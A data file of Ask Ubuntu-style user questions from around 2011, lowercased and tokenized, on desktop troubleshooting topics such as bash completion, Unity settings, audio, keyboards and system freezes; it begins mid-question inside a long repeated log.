nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ** ( process:1410 ) : warning ** : recent-manager-provider.vala:125 : desktop file for gaupol was not found ** ( process:1410 ) : warning ** : recent-manager-provider.vala:125 : desktop file for gaupol was not found ** ( process:1410 ) : warning ** : recent-manager-provider.vala:125 : desktop file for gaupol was not found ** ( process:1410 ) : debug : zeitgeist-datahub.vala:174 : inserting 1 events ** ( process:1410 ) : debug : zeitgeist-datahub.vala:174 : inserting 1 events ** ( process:1410 ) : warning ** : recent-manager-provider.vala:125 : desktop file for gaupol was not found ** ( process:1410 ) : warning ** : recent-manager-provider.vala:125 : desktop file for gaupol was not found ** ( process:1410 ) : warning ** : recent-manager-provider.vala:125 : desktop file for gaupol was not found ** ( process:1410 ) : debug : zeitgeist-datahub.vala:174 : inserting 1 events ** ( process:1410 ) : debug : zeitgeist-datahub.vala:174 : inserting 1 events thanks in advance , ciao h
41707	bash auto-completion with added spaces â why , and how to fix ?	i use tab completion more than typing letters . i used to type rm ~/de < tab > and it would be completed to rm ~/desktop/ so that i could continue on the next level . recently , that behaviour changed . the completion now yields rm ~/desktop < space > , which means i must backspace and type the slash if i want to continue . this makes me cry . the changes seem to be located in the function _longopt ( ) in /etc/bash_completion , however that is as far as i can follow . is this change intentional , and if so , what is it good for ? can i have the old behaviour back , preferably by a config option instead of just copying the old code over from some other system ? edit : the function for reference . _longopt ( ) { local cur prev split=false _get_comp_words_by_ref -n = cur prev _split_longopt & & split=true case `` $ prev '' in -- * [ dd ] [ ii ] [ rr ] * ) _filedir -d return 0 ; ; -- * [ ff ] [ ii ] [ ll ] [ ee ] *| -- * [ pp ] [ aa ] [ tt ] [ hh ] * ) _filedir return 0 ; ; esac $ split & & return 0 if [ [ `` $ cur '' == -* ] ] ; then compreply= ( $ ( compgen -w `` $ ( $ 1 -- help 2 > & 1 | \ sed -ne 's/.*\ ( -- [ -a-za-z0-9 ] \ { 1 , \ } \ ) . */\1/p ' | sort -u ) '' \ -- `` $ cur '' ) ) elif [ [ `` $ 1 '' == @ ( mk|rm ) dir ] ] ; then _filedir -d else _filedir fi }
41709	internal mic not working on my dell studio 1425	i just installed ubuntu 11.04 and my internal mic ( next to the webcam ) is not being detected . i tried recording the sound with sound recorder and also tried with skype but it failed . recording works when i use an external mic . i have tried playing around with alsamixer but it did not help . is there any way to fix this ?
41711	how to deal with a lot of windows ?	i 'm x-windows user and for some reason managing windows was easier for me on windows . on linux i also have consoles . is there any cool tool to help user with managing windows ?
41714	how to use word hyperlinks ?	when i open word document in open office i have link like this https : //somehome/someword.doc # some_section i think it should work that when i click on the link its forwarded to some_section in that document . however the link is opened in firefox and document is opened without focus on some_section . is there any way to use that function on linux ?
41716	what easter eggs are there in unity ?	are there any easter eggs in unity ? the easter eggs from here involving alt + f2 ( as provided by gnome-panel ) do n't work .
41728	what is the best practice for security updates ?	for all of my official ubuntu updates ( main universe multiverse restricted ) i use an israeli mirror of the ubuntu repositories , with one exception : for the security updates i use http : //security.ubuntu.com . the israeli isoc mirror also provides the security updates . what are the pros and cons of using a mirror instead of the official repository for security updates ? are there any real security concerns i should consider by moving my security updated to a mirror instead of the official server ?
41730	is there a way to disable the workspace switcher in unity launcher ?	the workspace switcher is not a regular launcher and not a lense but there must be a place where the panel gets it ( and the trash ) and where i maybe can easily unregister it ? ? ?
41735	always show global menu ?	hi all , i was wondering if it 's possible to have global menu always showing the full menu ? at the moment , global menu only shows the menu when hovering over the top panel . thanks !
41740	is there a shortcut to force close an application ?	back in 10.10 , i was able to force close an application by clicking the force close icon on the panel on top . now , with unity , i am not able to add new icons on the panel . so is there like a keyboard shortcut to force close an application ?
41742	extract text from a scanned document	is there any way to select the text from a scanned document ? ( output is a jpg ) what kind of tools does ubuntu offer to do such a task ? is there any libraries i can use instead of pre-build software binaries to do the same thing ? i tried converting it to a .pdf using imagemagick and then trying to select the text , which obviously did n't worked .
41747	how do i fix f10 , f11 and f12 ?	what software are related to the keyboard ? or the keyboard configuration ? problem it 's local , only at my account . it does n't help if i try the reassign the keys they still wo n't work . info my laptop . if i type xev in a terminal i notice that the key codes are gone . i pressed f12 and got this . focusout event , serial 33 , synthetic no , window 0x5200001 , mode notifygrab , detail notifyancestor focusin event , serial 33 , synthetic no , window 0x5200001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 33 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 how it happened i was trying to stream audio via this question/answer . but when i was finished and stopped the program i noticed that f10-f12 had stopped working . problem i do n't know what the software is called or how it works . the keycodes for : f10 is 76 f11 is 95 f12 is 96 solution the only solution i found was to reinstall ubuntu , sad , just hope the problem is a one time thing ...
41748	macbook pro ( 5,3 ) keyboard weirdness	my macbook pro ( 5,3 ) works almost completely ootb ( with restricted video and wifi drivers ) , but i am experiencing some keyboard weirdness . specifically to get either ( ` and ~ ) or ( ´ and ¨ ) i have to press the key twice . only these two keys behave this way - every other key mapping works . keyboard settings are : model : apple laptop ( due to # 538474 ) layout : united kingdom macintosh ( international )
41749	how can i extract audio track from video file and save it as mp3 ?	what is the easiest way to extract an audio track from a video file and save it as mp3 file ?
41759	how do i adjust the clock indicator format ?	recently i upgraded to ubuntu 11.04 . the clock indicator on the panel is not following my regional settings format . i edited locales and in all applications i have the right format of date and time except clock indicator on the panel . tried dconfig editor but keys for clock applet can not be changed . tried to purge indicator and reinstall it - still the same . is there any way that i could change formatting of datetime indicator ? here is format i 'm using system wide : % a , % d % b % y , % i : % m : % s here is format of datetime-indicator that pops up : % a % b % d % h : % m : % s
41760	hp g42 wo n't boot , halts on recovery session menu	i have a hp g42 . it was working but would randomly halt or restart the x session while running ubuntu 11.04 . finally , last night , it froze and was not able to boot anymore . it gets stuck in the ubuntu splash screen , an if i choose the recovery mode in grub , it sort of halts in the session selection menu . i have already run a memtest and it passes without errors . how to proceed to further debug this issue ?
41766	is it possible to enable google bookmarks sync in chromium ?	i 'm considering changing from google chrome to chromium in order to get as open sourced as possible . however , i 've always liked google chrome 's ability to synchronize my bookmarks to my google account ( i dual-boot with windows ) . is there any way to enable google bookmarks sync on chromium , or is that a chrome-only feature ? i 've looked around , but have n't been able to find any answers .
41768	is there a way to move the mouse pointer with the keyboard ?	sometimes my mouse will freeze randomly . the only solution is to reboot the machine entirely . however sometimes i just do n't feel like rebooting and i resort to ctrl + f , 'word here ' , esc and then press enter to navigate websites . as a better solution , do you know if there is a way to move the mouse pointer with the keyboard ? is this possible ? thanks .
41777	simple video editor - rotate and cut operations for mpg clips	could you , please , advise simple video editor for ubuntu 10.10 for mpg format . i need following operations : 1. rotate whole video - it was captured head down 2. cut part of clip ca n't find these functionality in pitivi and openshot apps . thank you for help screen for openshot clip :
41778	computer freezing on almost full ram , possibly disk cache problem	the problem i think is somewhat similar to this thread . it does n't matter if i have swap enabled or disabled , whenever the real used ram amount starts going close to maximum and there is almost no space left for disk cache , system becomes totally unresponsive . disk is spinnig wildly , and sometimes after long waits 10-30 minutes it will unfreeze , and sometimes not ( or i run out of patiance ) . sometimes if i act quickly i can manage to slowly open console and kill some of ram eating applications like browser , and the system unfreezes almost instantly . because of this problem i almost never see anything in the swap , only sometimes there are some few mb there , and then soon after this problem appears . my not so educated guess would be that it is connected somehow to the disk cache being too greedy , or memory management too lenient , so when the memory is needed it is not freed quickly enough and starves the system . problem can be achieved really fast if working with lagrge files ( 500mb+ ) which are loaded in disk cache and aparantly afterwards system is unable to unload them fast enough . any help or ideas will be greatly appreciated . for now i have to live in constant fear , when doing something computer can just freeze and i usually have to restart it , if it is really running out of ram i would much more like it to just kill some of userspace applications , like broser ( preferably if i could somehow mark which to kill first ) although the mistery is why doesnt swap save me in this situation . update : it didnt hang for some time , but now i got several occurances again . i am now keeping ram monitor on my screen at all times and when the hang happened it still showed ~30 % free ( used by disk cache probably ) . additional symptoms : if at the time i am watching video ( vlc player ) the sound stops first , after a few seconds the image stops . while the sound has stopped i still have some control over pc , but when the image stops i can not even move the mouse anymore , so i restarted it after some waiting . btw , this didnt happen when i started to watch the video but some time in ( 20min ) and i did n't actively do anything else at the time , even though browser and oowrite were open on the second screen the whole time . basically something just decides to happen at one point and hangs the system . as per request in the comments i ran dmesg right after the hang . i didnt notice anything weird , but didnt know for what to look , so here it is : https : //docs.google.com/document/d/1iqih0ee2dwsgd3vuqzu0bpbg0jgjsocrzhu0b05cmys/edit ? hl=en_us & authkey=cpzf7bcc
41783	i need documentation on how to create quicklists	can someone please tell me the language used for quicklists , and where i can find its documentation ? i know you can copy a similar quicklist and modify it , but that approach has serious limitations .
41785	how do i enable a clipboard manager ?	i 've manually installed clipboard managers in ubuntu before ( both klipper and glipper , iirc ) , and found them useful . does 11.04 ship with a standard clipboard manager ? if so , how do i enable it ? if not , how do i install and enable one ( i guess glipper is the best best , given that unity is running on gnome ) ?
41791	what 's the easiest way to unrar a file ?	i just realized i ca n't unrar .rar files on my ubuntu machine ! what 's the easiest way to accomplish this fundamental task ? if possible i 'd love something like 7zip that i can just right click , and extract and have the program worry about how to do it regardless if it 's a .zip , a .rar or a .foo compressed file .
41794	how to monitor & log server hardware temperatures & load	i am looking for a way to log & monitor my server hardware temperatures and load ( like for cpu or ram ) . how might i do that ? objective is to : ensure hardware is not heating up identify what should be upgraded & what is in excess ( like perhaps to learn maybe not to get such a good cpu for example ) ok i can use one of the applets that live in the task bar but what about logging ?
41802	will skype be removed from the canonical partner repository ?	i just learned that microsoft has taken over skype . will this affect the availability of skype in the canonical partner repository ?
41809	how to start x and unity , without gdm ?	i installed natty over my 10.10 that started in text mode . before natty , after booting , i run the graphical environment with startx and all was fine . now , with natty , if i run startx , the graphical environment starts without any gnome or unity menu ! . how do i start x and unity , without a graphical login manager ? thanks in advance .
41810	periodic keyboard lag/delay	on two of my computers running natty with gnome 3 , i 'm having periodic keyboard lag . it happens at a random interval after starting the computer . basically , the keyboard will stop functioning normally and only register input if you hold a key down for two or more seconds . when you release the key , it stops right away like it should . the only fix i 've found so far is to restart the computer . one computer only experiences this about once a day , and it 's not a big deal to restart it . the other computer does it quite frequently , sometimes even within the first few minutes after booting . last night i had to restart that computer probably five or six times over the course of a few hours . this started happening about a week ago , and i have n't been able to pinpoint a cause . does someone know how to permanently fix this problem ?
41815	integrate skype into messaging menu	i know skype is proprietary , but it would be awesome if it were to be integrated into messaging menu much like pidgin , empathy , etc . is there a plug-in that does that ?
41816	how do i monitor my total received network traffic from time x to time y ?	i assume that the system monitor app tracks the total mibs received since startup . i would like to track the total mibs received since an arbitrary point of time after startup . i often use a samsung 4g wireless hotspot , and it would be useful to monitor how fast i 'm using up my alotted monthly data i 'm using during a particular session .
41823	some windows are n't recognised by unity	some apps , including transmission in particular , are not recognized by the unity window manager . i am not able to focus or select certain windows . curiously , i also ca n't drag it to the launcher . opening works using the standard super > type 'trans.. ' > click . i 'm not quite sure what i did to edit this behavior , if i did anything at all . note that running the command unity -- reset does nothing for me . i 've been having some problems with unity ( crashes and glitches , etc ) .
41828	how to set up a network for a business	i want to set up a network for a small business , of around a dozen desktop computers , to look after software and allow them to store files centrally* . how do i go about doing this , and what equipment do i need ? i expect the answer to this is too long to answer in full here , if this is the case , are there any recommended texts ( where this process is taken step-by-step ) ? *presumably i need a server for this bit ?
41829	how can i search for files in unity ?	i 'm trying to use the dash instead of gnome-do , but i ca n't find files . `` find files '' only returns `` top results '' . in gnome-do , i was able to set some often-used directories to index . for example , i have a folder called `` toread '' that 's full of pdf files . i could search for pdf . then i can browse the pdf files in toread and open files without using my mouse . ideally , i want to replicate this functionality within the dash/places interface . is this possible ? if not , what 's the shortest way to do it ? clarifications : '' files & folders '' does not do what i want . it only shows files i 've used recently . i 'd like to be able to do this without using the mouse and without having to hit tab hundreds of times . i do n't need my search to be indexed . a file system crawl ( but only in the directories i set ) is fine .
41832	`` showroom '' installation of ubuntu ?	i 'm selling my old netbook with a clean version of ubuntu 10.10 ( the last version i was using on it ) installed . is it possible to install ubuntu in such a way that the new buyer can choose his own username , password , computer name , etc. , or must i do that myself ? i 'm not sure if there 's a technical term for this sort of installation , but i 'm referring to it as a `` showroom '' installation , as it 's how the os might behave if you were buying it new off the showroom floor .
41834	during boot , i only see a dark aubergine screen - how can i make plymouth work ?	in natty , during boot i only see a dark aubergine screen , nothing on it . that is irritating , because i do n't know whether the computer still runs or not . so how can i display the normal `` ubuntu '' plymouth bootscreen ? ( i use the nvidia proprietary driver . )
41835	libxml2.so.2 no version information available	i repeatedly get the following error when using grass gis and i think a few other programs : /usr/local/lib/libxml2.so.2 : no version information available ... as far as i can tell i have libxml2 installed at : /usr/local/lib/libxml2/ and /usr/local/lib/libxml2-2.7.8/ i imagine this has to do with setting an environmental variable somewhere . thank you in advance for your help .
41836	single administrator computer for systems with only regular account on network	how can i have systems with only a regular account with administrative tasks managed by a single computer ? edit i simply want be able to add/remove software on all computers from a single system . wholesale - not individually logging into each computer and doing what needs to be done . i can do that physically or by ssh , but with a hundred or so computers , that 's not really an option i would like to consider . it 'd be great if there 's some sort of internet cafe management type of software was out there available for ubuntu . update bounty ending soon . bumping up the question with this edit .
41840	sbackup when turning my pc off	i have installed and configured sbackup as explained in this ubuntu community guide to sbackup . it is very convenient for me to launch the backup process the first time i shut down my pc each day . the idea would be that when i tell ubuntu to shut my system down it launches the backup process if that is the first time in the day that my pc is halted . this way it does n't mess with my workflow , just take a little more to shut down ( no problem since i could then go away and let it finish by itself ) . some instructions are given in the aforementioned guide but unfortunately it does n't seem to work and even the given link to download the sbackupd file is broken . any help with this ?
41845	dell broadcom wireless switch wifi card with ( open source / ) libre one	i was just wondering if there 's a free ( as in free speech ) wifi card that actually works with ubuntu that i can buy that would replace my broadcom bcm3412 card . extra info : network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) it 's for a dell inspiron 1545 . i believe i read somewhere something like it 's a half card ? if that means anything ? i guess i 'm asking what wireless cards are around that have free ( as in free speech ) drivers , and can i swap them with my annoying proprietary driver 'd one . thanks !
41847	constant freezes on new sandy bridge thinkpad	i 've had my thinkpad t420 ( integrated graphics , 8gb ram , i5 ) for less than a month . i could n't successfully install natty ( installer finished , but would n't boot ) , so i went with maverick instead . on a daily basis , it completely freezes at least once , seemingly always when i 'm in firefox with multiple tabs open . my mouse can still move , but nothing is clickable , and i always have to do a hard restart . i confirmed that this is n't a unity bug , because i installed 10.10 in `` command-line only '' mode via the alternate install dvd , and manually installed x-server and fluxbox . the freezing still exists , without unity or even gnome running , whenever i do anything mildly resource-hungry in firefox . thanks for any guidance .
41855	libreoffice 3.3.2 `` export to pdf '' option does n't work	after installing natty 11.04 ( kubuntu ) , i noticed that the `` export to pdf '' menu item does n't work . i am thinking about doing an uninstall-reinstall . has anyone else had this problem , or it is a known bug ? thanks for any help !
41858	shortcut to switch between analog stereo output & hdmi audio output	to switch to hdmi audio output ( of monitor ) and back to normal audio output from system audio jack ( for headphones , as my monitor does n't have audio out ) , i find myself opening up sound preferences and selecting the right channel everytime . is there any way i can create a toggle button in the panel or assign some shortcut key to toggle since i do the switching so often . : aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 7 : stac92xx digital [ stac92xx digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0
41859	how to automatically install updates by a desktop user	i want to set ubuntu/lubuntu [ 10.04 ] to automatically install security updates for a normal desktop user ( user has no root privileges ) . if i set ubuntu/lubuntu [ 10.04 ] to automatically install updates in the background will it still install the security updates if the user logged in is not apart of the administrator group ?
41861	firewire audio interface not working on a mac pro	i have a mac pro with ubuntu 11.04 and i 'm not able to have any sound from my focusrite saffire le . i have the last version of both jack and ffado installed but i 'm not getting any sound from my audio interface eve though this interface is supposed to be fully supported by ffado in qjackctl 's settings i have selected firewire as driver and hw0 as my device . when i start jack from qjackctl i hear a little pop in my studio monitors and my interface seems to synchronize with the system but few seconds later it de-synchronize any help would be really appreciated .
41871	is there syntax highlighting for psql ?	is there some setting or package that i could use to give syntax highlighting to psql ( the postgresql shell ) ?
41875	how do i use a firefox 4 profile on a separate drive/partition	i have always used a separate partition/drive for data as well as having a separate partition for my home folder . i have now upgraded to ubuntu 11.04 and i found none of my profiles run under classic ubuntu or unity . they still run perfectly if i use the 'straight ' firefox 4 firefox-mozilla-build from the ubuntuzilla ppa . the error message is : firefox can not use the profile `` ? ? ? ? ? ? '' because it is in use . to continue , close the running instance of firefox or choose a different profile . this message is apparently given if the profile is locked or if the profile can not be found . it is clearly not a stale lock file as it occurs when you try to create a new profile so it would seem firefox can not find or has access blocked to the profile . i have narrowed the problem down even further and my existing profiles will run in the default location ~/.mozilla/firefox or in a sub-folder below that location . i can also create new profiles in the same locations but not elsewhere . i have edited profiles.ini to see if it is related to the isrelative addressing and that is not the cause as one can change a relative to absolute location without problems . i am baffled . is this a bug in the modifications for unity compatibility or a security feature which can be enabled/disabled ? any advice would be much appreciated .
41876	authentication failure wo n't resolve in ubuntu one	today u1 started to throw an error when trying to connect . at first i got a rather cryptic message ( something with auth_failure maybe ? ) upon which i found the following instructions : https : //wiki.ubuntu.com/ubuntuone/faq/whattodowhenauthenticationfails because none of the 3 possible causes described there turned out to be the case , i decided to remove my computer from the list of authenticated computers . login into the u1 account online and removing the computer was no problem but u1 still did nothing . finally with the instructions on https : //wiki.ubuntu.com/ubuntuone/faq/howdoiaddmycomputer i finaly got u1 to re-initiate the login/auth process ... but it kept failing to connect this time showing me the message : '' an exception representing an authentication failure '' so i decided to reset my password just to be sure . still , u1 does not connect , showing me the same message : ( what 's up ?
41877	hiding window decorations when maximized on gnome3	on 10.04 , i had had a very handy option from compiz that allowed me to hide the window decorations ( including the titlebar ) when window was maximized . how do i achieve the same with gnome 3 ?
41880	getting 10.04 lts interface on ubuntu 11.04	i 've recently upgraded my netbook to ubuntu 11.04 and the new gui interface looks somewhat nice ( i specially enjoy the workspace switcher and the new applications finder ) but i 'm missing some widgets i had on my ( now gone ) taskbar , widgets like limiting the cpu usage or load monitor that i have no idea how to get back . so , how can i use those widgets in this new interface ( unity , i think ) ? if that is n't possible how can i revert to the old interface without downgrading the operating system ? thanks in advance !
41886	firefox 4 using more battery power and slow	i updated my intel atom netbook to natty , and besides killing the battery , the new firefox 4 seems super slow , it takes half a minute to load a page , then the program does not respond too much at all . chromium is way faster , but i am uneasy using that browser , mostly because i use noscript and am kinda paranoid . are there any ways to speed it up ?
41889	mouse wheel scroll events persist after hitting meta key	for awhile now ( including in ubuntu 10.10 and 11.04 ) , i 've experienced an issue with scroll events initiated on my touchpad . steps to reproduce are : 1 ) open firefox 2 ) start a vertical scroll event on touchpad ( two-finger scroll , in my case ) 3 ) quickly hit ctrl the results are that firefox will start zooming in or zooming out the page . i also experience this if i start a scroll event and quickly switch to a different workspace -- where my terminal will start scrolling up or down . i would expect that the scroll event would die as soon a meta key is hit . i 'm on a thinkpad w510 on ubuntu 11.04 using unity . here 's all the info i can find on my touchpad : [ 10.808053 ] synaptics touchpad , model : 1 , fw : 7.2 , id : 0x1c0b1 , caps : 0xd047b3/0xb40000/0xa0000 [ 10.863551 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input7
41891	bash auto complete for environment variables	the bash autocomplete feature does not seem to work with environment variables in 11.04 . the current behavior is indicated below export script=/home/user/script cd $ script/ < tab > results in a \ being added before $ script i.e . the prompt becomes cd \ $ script/ same thing happens if cd is substituted with ls or any other command also , if there is an executable file in the path contained in $ script and i want to run that $ script/ < tab > bash does not show the options inside the folder ( regardless of whether there is a single file or multiple files/directories inside the path contained in the environment variables ) . in other words , autocomplete does not work with environment variables .
41893	how do you move the unity dash with a dual monitor setup ?	i 'm using 2 monitors with ubuntu 11.04 and ca n't for the life of me figure out how to move the unity dash/taskbar/whatever to where i want it ( the far left side of the left monitor ) . no matter what i do it remains on the left side of the right hand monitor . has anyone else figured out a way to achieve this ?
41899	how do i show the language ( keyboard layout ) indicator in the panel ?	gnome-shell how to show in panel language indicator ( keyboard layout ) how to enable it in panel ?
41902	is it possible to schedule the downloads required to upgrade ?	i 'd like to upgrade from 10.10 to 11.04 but my isp has a data-cap , limiting the amount i can download . thankfully , traffic between 2am and 8am does n't count towards this cap , but i 'm seldom awake at 2am to kick the upgrade process off . is there a way i can schedule either the upgrade or the downloads required for the upgrade to run at a certain time ?
41905	hp envy - hdmi / mini-display-port not working	i saw that many of hp envy users ( and some other hardwares ) are having problems while using ubuntu ( some other distributions too ) . problem my main issue is make my hdmi or mini-display-port work on linux ( ubuntu ) . i`m able to make it work smoothly on windows only : ( tip some guy create a blog , that is very nice and i could found some helps over there . but is kind of abandoned . general purpose the idea of this post is to put together all users and share though under this issue . thanks in advance for any reply/comment . update1 : looking this comment i could start to see something at the end of the road ! i will wait for some reply on this . if i have more news i`ll update this post !
41908	shutting down a computer remotely	what ways are there to shut down a computer remotely ? my desktop is running ubuntu 11.04 desktop edition and when i try to shut it down remotely using ssh , it does n't actually work . i used the command sudo shutdown now . afterwards , it said that the system is going down for maintenance now or whatever . however , when i got home , i came to discover that the computer was still on stuck on the plymouth shut-down screen . i would like to know some other ways to shut down remotely and it would also be nice to know why sudo shutdown now does n't actually work .
41912	is there a way to move passwords from `` default '' to `` login '' in seahorse ?	when i reinstalled ubuntu , i logged in on my wifi and authenticated with a password that seahorse saved in `` default '' . but i want that in `` login '' so that i wo n't have to enter my password twice everytime i reboot , how can that be done ?
41913	ubuntuone for backup	i want to use ubuntuone as backup for two machines ( one a server and one a desktop ) . i have the desktop sync 'd , but if i add the server in it loads the desktop files to the server . any suggestions as to how i can keep the two of them separate ?
41920	why i am getting a segmentation fault opening guitar pro ?	i am having this hard time with guitar pro on ubuntu 11.04 . i am getting a segmentation fault error from the application , but it used to work before on ubuntu 10.10 , suddenly it stopped working . this is the code from terminal : usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( :3559 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( :3559 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so ( :3559 ) : gtk-warning ** : /usr/lib/gtk-2.0/2.10.0/immodules/im-ibus.so : wrong elf class : elfclass64 ( :3559 ) : gtk-warning ** : loading im context type 'ibus ' failed ( :3559 ) : gtk-warning ** : /usr/lib/gtk-2.0/2.10.0/immodules/im-ibus.so : wrong elf class : elfclass64 ( :3559 ) : gtk-warning ** : loading im context type 'ibus ' failed /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( :3559 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf class : elfclass64 ( :3559 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so ( :3559 ) : gtk-warning ** : /usr/lib/gtk-2.0/2.10.0/immodules/im-ibus.so : wrong elf class : elfclass64 ( :3559 ) : gtk-warning ** : loading im context type 'ibus ' failed /usr/lib/gio/modules/libgiobamf.so : wrong elf class : elfclass64 failed to load module : /usr/lib/gio/modules/libgiobamf.so /usr/lib/gio/modules/libgvfsdbus.so : wrong elf class : elfclass64 failed to load module : /usr/lib/gio/modules/libgvfsdbus.so ( :3559 ) : gtk-warning ** : error loading theme icon 'dialog-information ' for stock : unable to load image-loading module : /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so : /usr/lib/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-png.so : wrong elf class : elfclass64 ( :3559 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ** ( :3559 ) : critical ** : murrine_style_draw_render_icon : assertion `base_pixbuf ! = null ' failed ( :3559 ) : gtk-critical ** : ia__gtk_style_render_icon : assertion `pixbuf ! = null ' failed ( :3559 ) : gdkpixbuf-critical ** : gdk_pixbuf_get_pixels : assertion `gdk_is_pixbuf ( pixbuf ) ' failed ( :3559 ) : gdkpixbuf-critical ** : gdk_pixbuf_get_width : assertion `gdk_is_pixbuf ( pixbuf ) ' failed ( :3559 ) : gdkpixbuf-critical ** : gdk_pixbuf_get_height : assertion `gdk_is_pixbuf ( pixbuf ) ' failed segmentation fault any ideas ? i am not very ubuntu savvy on this type of things . i am using ubuntu 64 bit
41923	has gnome2 been forked ?	i 'm a gnome2 fan , and i was wondering if the gnome2 stack had been successfully forked ( mainly just the top and bottom panel ) so we can use it in 11.10 when gnome2 classic is replaced by unity 2d . i heard there was talk about doing that , but i have n't heard if it was actually done or not .
41930	kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 )	upon trying to upgrade from 10.10 to 11.04 all seemed to go well until the restart . this error message is what comes up : kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) how do we fix that ?
41931	okular lacks menus except in fully maximised mode	running okular under ubuntu 11.04 ( w/ unity ) : okular does n't have menus anymore ( file , settings etc . ) unless i maximise its window .
41933	alt/win key behavior not working on macbookpro keyboard ( for mapping ctrl to win keys and the usual ctrl keys )	i 'm running natty with a clean install on a macbook pro ( with no osx install ) and currently loving the switch ! i found the area in keyboard layout options to map ctrl to the win keys ( and the usual ctrl keys ) and that turned my command key into a ctrl key which i 'm used to from mac osx ( working perfectly yesterday . ) however , now when i try , it 's not working and the settings are still the same ... i 've tried to add different keyboards ( worked with my original canada english default yesterday ... tried us macintosh and set keyboard model to macbook pro ( both regular and intl , neither worked . ) it was really weird because for a second my right command key was working as expected but not the left , and now neither are working . any thoughts or suggestions would be greatly appreciated .
41934	how can i make a window unclickable ?	i would like to be able to `` click through '' a certain window as if it was not there . how can i set this up ?
41935	how do you zoom in and out while on a skype call ?	i am using a logitech webcam pro 9000 and skype 2.2.0.25 and ubuntu 11.04 . i can not figure out how to zoom in and out during a video chat , although it is possible under windows using logitech 's software . is this function supported under skype and ubuntu 11.04 ?
41938	why is n't gnome color management having any effect at login ?	since upgrading to natty , my carefully produced monitor profiles are not being loaded at login . as soon as i open gnome color management they kick-in ( i do n't have to click anything ) , but i do n't want to open it every time . in my startup applications the following is activiated : gcm-apply -- login what do i need to do to fix this ?
